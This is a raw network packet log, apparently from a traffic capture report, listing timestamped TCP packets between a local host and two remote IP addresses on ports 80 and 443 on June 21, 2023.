Jun 21, 2023 04:27:50.888838053 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888848066 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888855934 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888875961 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888890028 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888900042 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888909101 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888926029 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888942003 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.888952017 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888977051 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.888994932 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889002085 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889014959 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889025927 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889039993 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889053106 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889072895 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889079094 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889091969 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889103889 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889117956 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889127970 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889139891 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889154911 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889182091 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889199018 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889206886 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889218092 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889230967 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889240980 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889256001 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889277935 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889281034 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889296055 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889306068 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889331102 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889333010 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889352083 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889354944 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889368057 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889379978 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889405012 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889424086 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889429092 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889441967 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889453888 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889468908 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889478922 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889501095 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889506102 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889518976 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889530897 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889544964 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889554977 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889570951 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889580965 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889605045 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889624119 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889631033 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889642000 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889657021 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889672041 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889682055 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889705896 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889724016 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889729977 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889741898 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889755964 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889771938 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889781952 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889791012 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889807940 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889827967 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889832973 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889859915 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889882088 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889883995 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889899969 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889909983 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889930010 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889934063 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889959097 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889976978 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.889981985 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.889997005 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890006065 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890029907 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890038013 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890038013 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890058041 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890074015 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890081882 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890099049 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890109062 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890120029 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890134096 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890151024 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890157938 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890183926 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890202045 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890208960 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890221119 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890234947 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890256882 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.890260935 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.890306950 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.926392078 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.952718019 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952760935 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952792883 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952822924 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952838898 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.952851057 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952877045 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.952883959 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952912092 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952940941 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952951908 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.952969074 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.952982903 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.952999115 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953026056 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953054905 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953066111 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.953083038 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953089952 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.953110933 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953138113 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953165054 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953178883 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.953193903 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953202009 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.953222990 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953253031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953280926 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953291893 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.953310013 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.953310966 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.960304976 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:50.960391045 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:50.960501909 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:51.016860962 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.016900063 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.016922951 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.016944885 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.016968966 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.016990900 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017004967 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017015934 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017040968 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017044067 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017059088 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017074108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017096996 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017118931 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017122984 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017142057 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017164946 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017188072 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017194033 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017210960 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017214060 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017234087 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017256975 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017280102 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017280102 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017298937 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017303944 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017328024 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017349958 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017350912 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017375946 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017400026 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017421961 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017421961 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017443895 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017446041 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017469883 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017492056 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017514944 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017517090 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017535925 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017539024 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017563105 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017585993 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017612934 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017621040 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017621994 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017636061 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017661095 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017683029 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017705917 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017725945 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017729998 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017746925 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017752886 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017776012 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017779112 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017801046 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017824888 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017847061 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017851114 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017868996 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017873049 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017899990 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017924070 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017931938 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017946959 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017971039 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.017978907 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.017996073 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018019915 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018019915 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018043995 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018064976 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018068075 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018091917 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018116951 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018131018 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018141031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018165112 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018166065 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018191099 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018214941 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018215895 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018238068 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018261909 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018285036 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018289089 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018309116 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018332005 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018342972 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018342972 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018356085 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018378973 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018402100 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018404007 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018424988 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018449068 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018470049 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018474102 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018490076 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018492937 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018517971 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018542051 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018562078 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018563986 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018584967 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018587112 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018610001 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018631935 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018654108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018654108 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018672943 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018677950 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018701077 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018726110 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018747091 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018749952 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018770933 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018784046 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018795013 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018810034 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018816948 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018838882 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018865108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018877029 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018888950 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018904924 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018913031 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018935919 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018958092 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.018959045 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.018982887 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019006014 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019027948 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.019030094 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019045115 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.019052982 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019076109 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019098997 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019121885 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019121885 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.019141912 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.019145966 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019171000 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019196033 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019217014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.019220114 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.019233942 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.019243002 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.021935940 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.025471926 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.165730953 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200495005 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200555086 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200599909 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200647116 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200694084 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200727940 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.200741053 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200789928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.200789928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.200812101 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200859070 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200906992 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.200916052 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.200968027 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201013088 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201020956 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201060057 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201105118 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201150894 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201162100 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201196909 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201200008 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201242924 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201288939 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201303005 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201334000 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201380014 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201389074 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201426983 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201472998 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201478004 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201518059 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201565981 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201580048 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201611996 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201658010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201666117 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201703072 CEST	80	49712	123.140.161.243	192.168.2.3
